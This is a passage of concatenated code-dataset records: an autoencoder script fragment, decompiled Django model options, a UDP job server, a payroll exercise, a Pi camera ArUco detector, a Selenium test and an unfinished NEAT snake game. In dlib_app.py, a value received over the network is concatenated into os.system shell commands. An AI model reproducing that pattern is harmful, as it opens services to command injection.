num_workers=4)\nval_loader = data.DataLoader(val_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\ntest_loader = data.DataLoader(test_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\n\n# Ensure that all operations are deterministic on GPU (if used) for reproducibility\ntorch.backends.cudnn.determinstic = True\ntorch.backends.cudnn.benchmark = False\n\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(\"Device:\", device)\n\nfor i in range(2):\n # Load example image\n img, _ = train_dataset[i]\n img_mean = img.mean(dim=[1,2], keepdims=True)\n\n # Shift image by one pixel\n SHIFT = 1\n img_shifted = torch.roll(img, shifts=SHIFT, dims=1)\n img_shifted = torch.roll(img_shifted, shifts=SHIFT, dims=2)\n img_shifted[:,:1,:] = img_mean\n img_shifted[:,:,:1] = img_mean\n compare_imgs(img, img_shifted, \"Shifted -\")\n\n # Set half of the image to zero\n img_masked = img.clone()\n img_masked[:,:img_masked.shape[1]//2,:] = img_mean\n compare_imgs(img, img_masked, \"Masked -\")\n\nmodel_dict = {}\nfor latent_dim in [64, 128, 256, 384]:\n model_ld, result_ld = train_cifar(latent_dim)\n model_dict[latent_dim] = {\"model\": model_ld, \"result\": result_ld}\n \ninput_imgs = get_train_images(32)\nfor latent_dim in model_dict:\n visualize_reconstructions(model_dict[latent_dim][\"model\"], input_imgs)\n \nvisualize_reconstructions(model, input_imgs)\n","sub_path":"code/autoencoder_cifar.py","file_name":"autoencoder_cifar.py","file_ext":"py","file_size_in_byte":12859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648947894","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-jkXn_D/django/django/db/models/options.py\n# Compiled at: 2018-07-11 18:15:30\nfrom __future__ import unicode_literals\nimport re\nfrom bisect import bisect\nfrom django.conf import settings\nfrom django.db.models.related import RelatedObject\nfrom django.db.models.fields.related import ManyToManyRel\nfrom django.db.models.fields import AutoField, FieldDoesNotExist\nfrom django.db.models.fields.proxy import OrderWrt\nfrom django.db.models.loading import get_models, app_cache_ready\nfrom django.utils import six\nfrom django.utils.datastructures import SortedDict\nfrom django.utils.encoding import force_text, smart_text, python_2_unicode_compatible\nfrom django.utils.translation import activate, deactivate_all, get_language, string_concat\nget_verbose_name = lambda class_name: re.sub(b'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', b' \\\\1', class_name).lower().strip()\nDEFAULT_NAMES = ('verbose_name', 'verbose_name_plural', 'db_table', 'ordering', 'unique_together',\n 'permissions', 'get_latest_by', 'order_with_respect_to', 'app_label',\n 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable', 'auto_created',\n 'index_together')\n\n@python_2_unicode_compatible\nclass Options(object):\n\n def __init__(self, meta, app_label=None):\n self.local_fields, self.local_many_to_many = [], []\n self.virtual_fields = []\n self.module_name, self.verbose_name = (None, None)\n self.verbose_name_plural = None\n self.db_table = b''\n self.ordering = []\n self.unique_together = []\n self.index_together = []\n self.permissions = []\n self.object_name, self.app_label = None, app_label\n self.get_latest_by = None\n self.order_with_respect_to = None\n self.db_tablespace = settings.DEFAULT_TABLESPACE\n self.admin = None\n self.meta = meta\n self.pk = None\n self.has_auto_field, self.auto_field = False, None\n self.abstract = False\n self.managed = True\n self.proxy = False\n self.proxy_for_model = None\n self.concrete_model = None\n self.swappable = None\n self.parents = SortedDict()\n self.duplicate_targets = {}\n self.auto_created = False\n self.abstract_managers = []\n self.concrete_managers = []\n self.related_fkey_lookups = []\n return\n\n def contribute_to_class(self, cls, name):\n from django.db import connection\n from django.db.backends.util import truncate_name\n cls._meta = self\n self.installed = re.sub(b'\\\\.models$', b'', cls.__module__) in settings.INSTALLED_APPS\n self.object_name = cls.__name__\n self.module_name = self.object_name.lower()\n self.verbose_name = get_verbose_name(self.object_name)\n if self.meta:\n meta_attrs = self.meta.__dict__.copy()\n for name in self.meta.__dict__:\n if name.startswith(b'_'):\n del meta_attrs[name]\n\n for attr_name in DEFAULT_NAMES:\n if attr_name in meta_attrs:\n setattr(self, attr_name, meta_attrs.pop(attr_name))\n elif hasattr(self.meta, attr_name):\n setattr(self, attr_name, getattr(self.meta, attr_name))\n\n ut = meta_attrs.pop(b'unique_together', self.unique_together)\n if ut and not isinstance(ut[0], (tuple, list)):\n ut = (\n ut,)\n self.unique_together = ut\n if self.verbose_name_plural is None:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n if meta_attrs != {}:\n raise TypeError(b\"'class Meta' got invalid attribute(s): %s\" % (b',').join(meta_attrs.keys()))\n else:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n del self.meta\n if not self.db_table:\n self.db_table = b'%s_%s' % (self.app_label, self.module_name)\n self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())\n return\n\n def _prepare(self, model):\n if self.order_with_respect_to:\n self.order_with_respect_to = self.get_field(self.order_with_respect_to)\n self.ordering = ('_order', )\n model.add_to_class(b'_order', OrderWrt())\n else:\n self.order_with_respect_to = None\n if self.pk is None:\n if self.parents:\n field = next(six.itervalues(self.parents))\n already_created = [ fld for fld in self.local_fields if fld.name == field.name ]\n if already_created:\n field = already_created[0]\n field.primary_key = True\n self.setup_pk(field)\n else:\n auto = AutoField(verbose_name=b'ID', primary_key=True, auto_created=True)\n model.add_to_class(b'id', auto)\n collections = {}\n for column, target in six.iteritems(self.duplicate_targets):\n try:\n collections[target].add(column)\n except KeyError:\n collections[target] = set([column])\n\n self.duplicate_targets = {}\n for elt in six.itervalues(collections):\n if len(elt) == 1:\n continue\n for column in elt:\n self.duplicate_targets[column] = elt.difference(set([column]))\n\n return\n\n def add_field(self, field):\n if field.rel and isinstance(field.rel, ManyToManyRel):\n self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)\n if hasattr(self, b'_m2m_cache'):\n del self._m2m_cache\n else:\n self.local_fields.insert(bisect(self.local_fields, field), field)\n self.setup_pk(field)\n if hasattr(self, b'_field_cache'):\n del self._field_cache\n del self._field_name_cache\n if hasattr(self, b'_name_map'):\n del self._name_map\n\n def add_virtual_field(self, field):\n self.virtual_fields.append(field)\n\n def setup_pk(self, field):\n if not self.pk and field.primary_key:\n self.pk = field\n field.serialize = False\n\n def pk_index(self):\n \"\"\"\n Returns the index of the primary key field in the self.fields list.\n \"\"\"\n return self.fields.index(self.pk)\n\n def setup_proxy(self, target):\n \"\"\"\n Does the internal setup so that the current model is a proxy for\n \"target\".\n \"\"\"\n self.pk = target._meta.pk\n self.proxy_for_model = target\n self.db_table = target._meta.db_table\n\n def __repr__(self):\n return b'' % self.object_name\n\n def __str__(self):\n return b'%s.%s' % (smart_text(self.app_label), smart_text(self.module_name))\n\n def verbose_name_raw(self):\n \"\"\"\n There are a few places where the untranslated verbose name is needed\n (so that we get the same value regardless of currently active\n locale).\n \"\"\"\n lang = get_language()\n deactivate_all()\n raw = force_text(self.verbose_name)\n activate(lang)\n return raw\n\n verbose_name_raw = property(verbose_name_raw)\n\n def _swapped(self):\n \"\"\"\n Has this model been swapped out for another? If so, return the model\n name of the replacement; otherwise, return None.\n\n For historical reasons, model name lookups using get_model() are\n case insensitive, so we make sure we are case insensitive here.\n \"\"\"\n if self.swappable:\n model_label = b'%s.%s' % (self.app_label, self.object_name.lower())\n swapped_for = getattr(settings, self.swappable, None)\n if swapped_for:\n try:\n swapped_label, swapped_object = swapped_for.split(b'.')\n except ValueError:\n return swapped_for\n\n if b'%s.%s' % (swapped_label, swapped_object.lower()) not in (None, model_label):\n return swapped_for\n return\n\n swapped = property(_swapped)\n\n def _fields(self):\n \"\"\"\n The getter for self.fields. This returns the list of field objects\n available to this model (including through parent models).\n\n Callers are not permitted to modify this list, since it's a reference\n to this instance (not a copy).\n \"\"\"\n try:\n self._field_name_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_name_cache\n\n fields = property(_fields)\n\n def get_fields_with_model(self):\n \"\"\"\n Returns a sequence of (field, model) pairs for all fields. The \"model\"\n element is None for fields on the current model. Mostly of use when\n constructing queries so that we know which model a field belongs to.\n \"\"\"\n try:\n self._field_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_cache\n\n def _fill_fields_cache(self):\n cache = []\n for parent in self.parents:\n for field, model in parent._meta.get_fields_with_model():\n if model:\n cache.append((field, model))\n else:\n cache.append((field, parent))\n\n cache.extend([ (f, None) for f in self.local_fields ])\n self._field_cache = tuple(cache)\n self._field_name_cache = [ x for x, _ in cache ]\n return\n\n def _many_to_many(self):\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(self._m2m_cache)\n\n many_to_many = property(_many_to_many)\n\n def get_m2m_with_model(self):\n \"\"\"\n The many-to-many version of get_fields_with_model().\n \"\"\"\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(six.iteritems(self._m2m_cache))\n\n def _fill_m2m_cache(self):\n cache = SortedDict()\n for parent in self.parents:\n for field, model in parent._meta.get_m2m_with_model():\n if model:\n cache[field] = model\n else:\n cache[field] = parent\n\n for field in self.local_many_to_many:\n cache[field] = None\n\n self._m2m_cache = cache\n return\n\n def get_field(self, name, many_to_many=True):\n \"\"\"\n Returns the requested field by name. Raises FieldDoesNotExist on error.\n \"\"\"\n to_search = many_to_many and self.fields + self.many_to_many or self.fields\n for f in to_search:\n if f.name == name:\n return f\n\n raise FieldDoesNotExist(b'%s has no field named %r' % (self.object_name, name))\n\n def get_field_by_name(self, name):\n \"\"\"\n Returns the (field_object, model, direct, m2m), where field_object is\n the Field instance for the given name, model is the model containing\n this field (None for local fields), direct is True if the field exists\n on this model, and m2m is True for many-to-many relations. When\n 'direct' is False, 'field_object' is the corresponding RelatedObject\n for this field (since the field doesn't have an instance associated\n with it).\n\n Uses a cache internally, so after the first access, this is very fast.\n \"\"\"\n try:\n try:\n return self._name_map[name]\n except AttributeError:\n cache = self.init_name_map()\n return cache[name]\n\n except KeyError:\n raise FieldDoesNotExist(b'%s has no field named %r' % (\n self.object_name, name))\n\n def get_all_field_names(self):\n \"\"\"\n Returns a list of all field names that are possible for this model\n (including reverse relation names). This is used for pretty printing\n debugging output (a list of choices), so any internal-only field names\n are not included.\n \"\"\"\n try:\n cache = self._name_map\n except AttributeError:\n cache = self.init_name_map()\n\n names = sorted(cache.keys())\n return [ val for val in names if not val.endswith(b'+') ]\n\n def init_name_map(self):\n \"\"\"\n Initialises the field name -> field object mapping.\n \"\"\"\n cache = {}\n for f, model in self.get_all_related_m2m_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, True)\n\n for f, model in self.get_all_related_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, False)\n\n for f, model in self.get_m2m_with_model():\n cache[f.name] = (\n f, model, True, True)\n\n for f, model in self.get_fields_with_model():\n cache[f.name] = (\n f, model, True, False)\n\n if app_cache_ready():\n self._name_map = cache\n return cache\n\n def get_add_permission(self):\n return b'add_%s' % self.object_name.lower()\n\n def get_change_permission(self):\n return b'change_%s' % self.object_name.lower()\n\n def get_delete_permission(self):\n return b'delete_%s' % self.object_name.lower()\n\n def get_all_related_objects(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n return [ k for k, v in self.get_all_related_objects_with_model(local_only=local_only, include_hidden=include_hidden, include_proxy_eq=include_proxy_eq)\n ]\n\n def get_all_related_objects_with_model(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n \"\"\"\n Returns a list of (related-object, model) pairs. Similar to\n get_fields_with_model().\n \"\"\"\n try:\n self._related_objects_cache\n except AttributeError:\n self._fill_related_objects_cache()\n\n predicates = []\n if local_only:\n predicates.append(lambda k, v: not v)\n if not include_hidden:\n predicates.append(lambda k, v: not k.field.rel.is_hidden())\n cache = self._related_objects_proxy_cache if include_proxy_eq else self._related_objects_cache\n return [ t for t in cache.items() if all(p(*t) for p in predicates) ]\n\n def _fill_related_objects_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_objects_with_model(include_hidden=True):\n if (obj.field.creation_counter < 0 or obj.field.rel.parent_link) and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n proxy_cache = cache.copy()\n for klass in get_models(include_auto_created=True, only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_fields:\n if f.rel and not isinstance(f.rel.to, six.string_types):\n if self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n elif self.concrete_model == f.rel.to._meta.concrete_model:\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n\n self._related_objects_cache = cache\n self._related_objects_proxy_cache = proxy_cache\n return\n\n def get_all_related_many_to_many_objects(self, local_only=False):\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n if local_only:\n return [ k for k, v in cache.items() if not v ]\n return list(cache)\n\n def get_all_related_m2m_objects_with_model(self):\n \"\"\"\n Returns a list of (related-m2m-object, model) pairs. Similar to\n get_fields_with_model().\n \"\"\"\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n return list(six.iteritems(cache))\n\n def _fill_related_many_to_many_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_m2m_objects_with_model():\n if obj.field.creation_counter < 0 and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n for klass in get_models(only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_many_to_many:\n if f.rel and not isinstance(f.rel.to, six.string_types) and self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n\n if app_cache_ready():\n self._related_many_to_many_cache = cache\n return cache\n\n def get_base_chain(self, model):\n \"\"\"\n Returns a list of parent classes leading to 'model' (order from closet\n to most distant ancestor). This has to handle the case were 'model' is\n a granparent or even more distant relation.\n \"\"\"\n if not self.parents:\n return\n if model in self.parents:\n return [model]\n for parent in self.parents:\n res = parent._meta.get_base_chain(model)\n if res:\n res.insert(0, parent)\n return res\n\n raise TypeError(b'%r is not an ancestor of this model' % model._meta.module_name)\n\n def get_parent_list(self):\n \"\"\"\n Returns a list of all the ancestor of this model as a list. Useful for\n determining if something is an ancestor, regardless of lineage.\n \"\"\"\n result = set()\n for parent in self.parents:\n result.add(parent)\n result.update(parent._meta.get_parent_list())\n\n return result\n\n def get_ancestor_link(self, ancestor):\n \"\"\"\n Returns the field on the current model which points to the given\n \"ancestor\". This is possible an indirect link (a pointer to a parent\n model, which points, eventually, to the ancestor). Used when\n constructing table joins for model inheritance.\n\n Returns None if the model isn't an ancestor of this one.\n \"\"\"\n if ancestor in self.parents:\n return self.parents[ancestor]\n for parent in self.parents:\n parent_link = parent._meta.get_ancestor_link(ancestor)\n if parent_link:\n return self.parents[parent] or parent_link\n\n def get_ordered_objects(self):\n \"\"\"Returns a list of Options objects that are ordered with respect to this object.\"\"\"\n if not hasattr(self, b'_ordered_objects'):\n objects = []\n self._ordered_objects = objects\n return self._ordered_objects","sub_path":"pycfiles/ka_lite_static-0.17.5-py2-none-any/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":19606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100840928","text":"import os\nimport sys\nimport socket\nfrom config import *\n\nserverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserverSock.bind((\"csml-dlib\", apps[\"dlib\"]))\n\ndef main():\n # (simplest) CMD_LINE Format\n # app:container_id:simple_request\n while True:\n\n CMD_LINE, SOURCE_ADDR = serverSock.recvfrom(1024)\n CMD_LINE = CMD_LINE.decode('utf-8')\n container_id = CMD_LINE.split(\":\")[1] # type:str\n simple_request = CMD_LINE.split(\":\")[2] # type:str 'Y' or 'N'\n\n # Ready to process, change the status to [pending]\n # If first use, ignore the error anyway, no harm\n EXE_LINE = \"mv /results/opencv/\" + str(container_id) + \".log /results/dlib/[pending]\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\n if simple_request == 'Y':\n EXE_LINE = \"/dlib-19.18/examples/build/svm_ex\"\n EXE_LINE += \" | ts '[%Y-%m-%d %H:%M:%S]'\"\n EXE_LINE += \" | tee -a /results/dlib/[pending]\" # -a for appending\n EXE_LINE += str(container_id) + \".log\" # One user one .log file\n os.system(EXE_LINE)\n\n # Remove the [pending] status\n EXE_LINE = \"mv /results/dlib/[pending]\" + str(container_id) + \".log /results/dlib/\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\nif __name__ == \"__main__\":\n main()","sub_path":"code/app/dlib_app.py","file_name":"dlib_app.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"488705537","text":"# Classes ==================================================================\n \nclass Programmer:\n \n # Add the class attributes\n salary = 30000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, programming_languages):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.programming_languages = programming_languages\n \nclass Assistant:\n \n # Add the class attributes\n salary = 20000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, bilingual):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.bilingual = bilingual\n \n# Program ==================================================================\n \n# Function that prints the monthly salary of each worker\n# and the total amount that the startup owner has to pay per month\ndef calculate_payroll(employees):\n \n total = 0\n \n print(\"\\n========= Welcome to our Payroll System =========\\n\")\n \n # Iterate over the list of instances to calculate\n # and display the monthly salary of each employee,\n # and add the monthly salary to the total for this month\n for employee in employees:\n salary = round(employee.salary / 12, 2) + employee.monthly_bonus\n print(employee.name.capitalize() + \"'s salary is: $\" + str(salary))\n total += salary\n \n # Display the total \n print(\"\\nThe total payroll this month will be: $\", total)\n \n# Instances (employees)\njack = Programmer(\"Jack\", 45, \"5th Avenue\", \"555-563-345\", [\"Python\", \"Java\"])\nisabel = Programmer(\"Isabel\", 25, \"6th Avenue\", \"234-245-853\", [\"JavaScript\"])\nnora = Assistant(\"Nora\", 23, \"7th Avenue\", \"562-577-333\", True)\n \n# List of instances\nemployees = [jack, isabel, nora]\n \n# Function call - Passing the list of instances as argument\ncalculate_payroll(employees)\n","sub_path":"payroll (mini project)/payroll.py","file_name":"payroll.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426019411","text":"'''\n* Team ID : 117\n* Author List : Ebey Abraham, Akshatha Nayak, Anandhu Udayakumar\n* Filename : picam.py\n* Theme : Antbot\n* Functions : detectAruco(img), markAruco(img,aruco_list), getArucoID(), getArucoBits()\n* Global Variables : NONE\n'''\nfrom imutils.video.videostream import VideoStream\nimport imutils\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\nimport time\nimport csv\nimport pandas as pd\nimport numpy as np\n\nclass Camera:\n def __init__(self):\n self.IDs = []\n #range for red color\n self.lower_red = np.array([160,100,0])\n self.upper_red = np.array([180,255,255])\n #range for blue color\n self.lower_blue = np.array([100,100,0])\n self.upper_blue = np.array([140,255,255])\n #range for green color\n self.lower_green = np.array([40,100,0])\n self.upper_green = np.array([80,255,255])\n #range for yellow color\n self.lower_yellow = np.array([10,100,100])\n self.upper_yellow = np.array([30,255,255])\n\n '''\n * Function Name : detectAruco\n * Input : img-> image to detect aruco marker from\n * Output : returns the detected aruco id and its corner as a dictionary\n * Logic : check that the image frame has only one aruco marker and return the id and corner list as a key value pair\n * Example Call : detectAruco(img)\n '''\n def detectAruco(self,img):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #create aruco dictionary of 7x7 bits and 1000 combinations\n aruco_dict = aruco.Dictionary_get(aruco.DICT_7X7_1000)\n parameters = aruco.DetectorParameters_create()\n #list of corners and ids\n corners, ids, _ = aruco.detectMarkers(gray,aruco_dict,parameters = parameters)\n aruco_list = {} #stores pairs of aruco id and corresponding corners\n #check that only one aruco marker is there and return the aruco id\n if len(corners) == 1:\n aruco_list[ids[0][0]] = corners[0][0]\n return aruco_list\n\n '''\n * Function Name : markAruco\n * Input : img-> image to detect aruco marker from\n aruco_list -> dictionary of aruco corners indexed by the aruco ID\n * Output : returns the image with the marked corners\n * Logic : find the center of the aruco marker by finding the mean and mark the center and the corners\n * Example Call : markAruco(img,aruco_list)\n '''\n def markAruco(self,img,aruco_list):\n ids = aruco_list.keys()\n font = cv2.FONT_HERSHEY_SIMPLEX\n for id in ids:\n corners = aruco_list[id]\n center = corners[0] + corners[1] + corners[2] + corners[3]\n center[:] = [int(x/4) for x in center]\n center = tuple(center)\n #marking the points\n cv2.circle(img,center,1,(0,0,255),8)\n cv2.circle(img,tuple(corners[0]),1,(0,0,255),8)\n cv2.circle(img,tuple(corners[1]),1,(0,255,0),8)\n cv2.circle(img,tuple(corners[2]),1,(255,0,0),8)\n return img\n\n '''\n * Function Name : getArucoID\n * Input : NONE\n * Output : returns the detected aruco ID\n * Logic : loop the camera feed till a aruco marker id detected by detectAruco\n * Example Call : getArucoID()\n '''\n def getArucoID(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n ids = []\n while len(ids) < 4:\n ID = 0 #stores the detected ID\n frame = vs.read()\n aruco_list = self.detectAruco(frame)\n if len(aruco_list):\n foundID = True\n ID = list(aruco_list.keys())\n ID = ID[0]\n #check that the detected ID is not repeated and add to the list of ids\n if ID > 0 and ID not in ids:\n ids.append(ID)\n #self.IDs.append(bin(ID)[2:]) #store ID in binary format\n print(\"ID Detected: {}\".format(ID))\n vs.stop()\n\n def getColor(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n count = 3\n colors = {'r':0,'b':0,'g':0,'y':0}\n while count:\n count -= 1\n frame = vs.read()\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n mask_red = cv2.inRange(hsv,self.lower_red,self.upper_red)\n mask_blue = cv2.inRange(hsv,self.lower_blue,self.upper_blue)\n mask_green = cv2.inRange(hsv,self.lower_green,self.upper_green)\n mask_yellow = cv2.inRange(hsv,self.lower_yellow,self.upper_yellow)\n\n colors['r'] = cv2.countNonZero(mask_red)\n colors['b'] = cv2.countNonZero(mask_blue)\n colors['g'] = cv2.countNonZero(mask_green)\n colors['y'] = cv2.countNonZero(mask_yellow)\n\n #res = cv2.bitwise_and(frame,frame,mask = mask_yellow)\n #cv2.imshow(\"Res\",res)\n #cv2.waitKey(10)\n vs.stop()\n print(colors)\n for color in colors:\n if colors[color] > 5000:\n return color\n return 'x'\n\n\nif __name__ == \"__main__\":\n cam = Camera()\n res = cam.getColor()\n print(res)\n","sub_path":"utils/picam.py","file_name":"picam.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181941212","text":"import time\n\nfrom django.test import TestCase, override_settings\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .utils import element_has_css_class\n\nimport os\nos.environ['WDM_LOG_LEVEL'] = '0'\n\nclass TestBatonIndex(TestCase):\n def setUp(self):\n service = Service(ChromeDriverManager(version='114.0.5735.90').install())\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-dev-shm-usage')\n self.driver = webdriver.Chrome(\n service=service,\n options=chrome_options,\n )\n self.driver.set_window_size(1920, 1080)\n self.driver.implicitly_wait(10)\n self.login()\n\n def tearDown(self):\n self.driver.quit()\n\n def login(self):\n self.driver.get('http://localhost:8000/admin')\n username_field = self.driver.find_element(By.ID, \"id_username\")\n password_field = self.driver.find_element(By.ID, \"id_password\")\n button = self.driver.find_element(By.CSS_SELECTOR, 'input[type=submit]')\n\n username_field.send_keys('admin')\n time.sleep(1)\n password_field.send_keys('admin')\n time.sleep(1)\n button.click()\n\n def test_force_theme(self):\n # Wait until baton is ready\n wait = WebDriverWait(self.driver, 10)\n wait.until(element_has_css_class((By.TAG_NAME, 'body'), \"baton-ready\"))\n\n # site title\n html = self.driver.find_element(By.CSS_SELECTOR, \"html\")\n self.assertEqual(\n html.get_attribute('data-bs-theme'), 'light')\n","sub_path":"testapp/app/app/tests/test_e2e_theme.py","file_name":"test_e2e_theme.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474173512","text":"import pygame\nimport time\nimport random\nimport neat\nimport os\nimport math\n \npygame.init()\n \nwhite = (255, 255, 255)\nyellow = (255, 255, 102)\nblack = (0, 0, 0)\nred = (213, 50, 80)\ngreen = (0, 255, 0)\nblue = (50, 153, 213)\n \ndis_width = 230\ndis_height = 230\n \nbestscore1 = 0\n\ndis = pygame.display.set_mode((dis_width, dis_height))\npygame.display.set_caption('Snake Game by Taren P')\n \nclock = pygame.time.Clock()\n \nsnake_block = 10\nsnake_speed = 150\n \napple = pygame.image.load(os.path.join(\"Graphics\", \"apple.png\"))\napple = pygame.transform.scale(apple, (20, 20))\nfont_style = pygame.font.SysFont(\"bahnschrift\", 15)\nscore_font = pygame.font.SysFont(\"comicsansms\", 20)\n \ndef remove(index):\n snakes.pop(index)\n ge.pop(index)\n nets.pop(index)\n\ndef Your_score(score, y):\n global bestscore1\n text_1 = font_style.render(f'Snakes Alive: {str(len(snakes))}', True, white)\n dis.blit(text_1, [100, 210])\n value = score_font.render(\"Your Score: \" + str(score), True, yellow)\n dis.blit(value, [0, 0])\n if bestscore1 < score:\n bestscore1 = score\n value3 = font_style.render(f'Generation: {pop.generation+1}', True, white)\n dis.blit(value3, [0, 190])\n value2 = font_style.render(\"Best Score: \" + str(bestscore1), True, white)\n dis.blit(value2, [0, 210])\n\ndef find(lst, r):\n return [i for i, x in enumerate(lst) if x == r]\n \n \ndef our_snake(snake_block, snake_list):\n for x in snake_list:\n pygame.draw.rect(dis, green, [x[0], x[1], snake_block, snake_block])\n \ndef distance(pos_a, pos_b):\n dx = pos_a[0]-pos_b[0]\n dy = pos_a[1]-pos_b[1]\n return math.sqrt(dx**2+dy**2)\n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return int(n * multiplier) / multiplier\n\nscore = 0\ndef gameLoop(genomes, config, i, y):\n game_over = False\n game_close = False\n global score\n x1 = (dis_width / 2) + 5\n y1 = (dis_height / 2) + 5\n \n x1_change = 0\n y1_change = 0\n location = []\n amount = []\n counter = 0\n\n snake_List = []\n Length_of_snake = 3\n score = 0\n #x1_change = -snake_block\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if x1 >= dis_width or x1 < 0 or y1 >= dis_height or y1 < 0:\n ge[i].fitness -= 10\n game_close = True\n x1 += x1_change\n y1 += y1_change\n dis.fill(blue)\n l = 0\n if foody == (dis_width/2) + 5:\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n if foodx == (dis_height/2) + 5:\n foodx = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n while l <= dis_width/10:\n pygame.draw.line(dis, black, (0, (dis_height / 23)*l), (dis_width, (dis_height / 23)*l))\n pygame.draw.line(dis, black, ((dis_width / 23)*l, 0), ((dis_width / 23)*l, dis_height))\n l+=1\n pygame.draw.rect(dis, red, [foodx, foody, snake_block, snake_block])\n dis.blit(apple, (foodx-5, foody -5.7))\n snake_Head = []\n snake_Head.append(x1)\n snake_Head.append(y1)\n snake_List.append(snake_Head)\n if len(snake_List) > Length_of_snake:\n del snake_List[0]\n \n for x in snake_List[:-1]:\n if x == snake_Head:\n ge[i].fitness -= 10\n game_close = True\n output = nets[i].activate((distance((x1, y1), (foodx, foody)), Length_of_snake, x1, y1, dis_width, foodx, foody))\n if output[0] > 0.5:\n x1_change = -snake_block\n y1_change = 0\n if output[1] > 0.5:\n x1_change = snake_block\n y1_change = 0\n if output[2] > 0.5:\n y1_change = -snake_block\n x1_change = 0\n if output[3] > 0.5:\n y1_change = snake_block\n x1_change = 0\n location.append(distance((x1, y1), (foodx, foody)))\n if len(location) > 100:\n del location[0]\n for r in location:\n amount = find(location, r)\n if len(amount) > 2:\n ge[i].fitness -= 10\n game_close = True\n our_snake(snake_block, snake_List)\n Your_score(Length_of_snake - 3, y)\n pygame.display.update()\n if x1 == foodx and y1 == foody:\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake += 1\n if counter > 12:\n ge[i] += 0.3\n clock.tick(snake_speed)\n if game_close == True:\n score = Length_of_snake -3\n ge[i].fitness += score*20\n # print(ge[i].fitness)\n remove(i)\n break\n \ndef eval_genomes(genomes, config):\n global snakes, ge, nets, i\n snakes = []\n ge = []\n nets = []\n y = 0\n for genome_id, genome in genomes:\n snakes.append(\"snake\")\n ge.append(genome)\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n 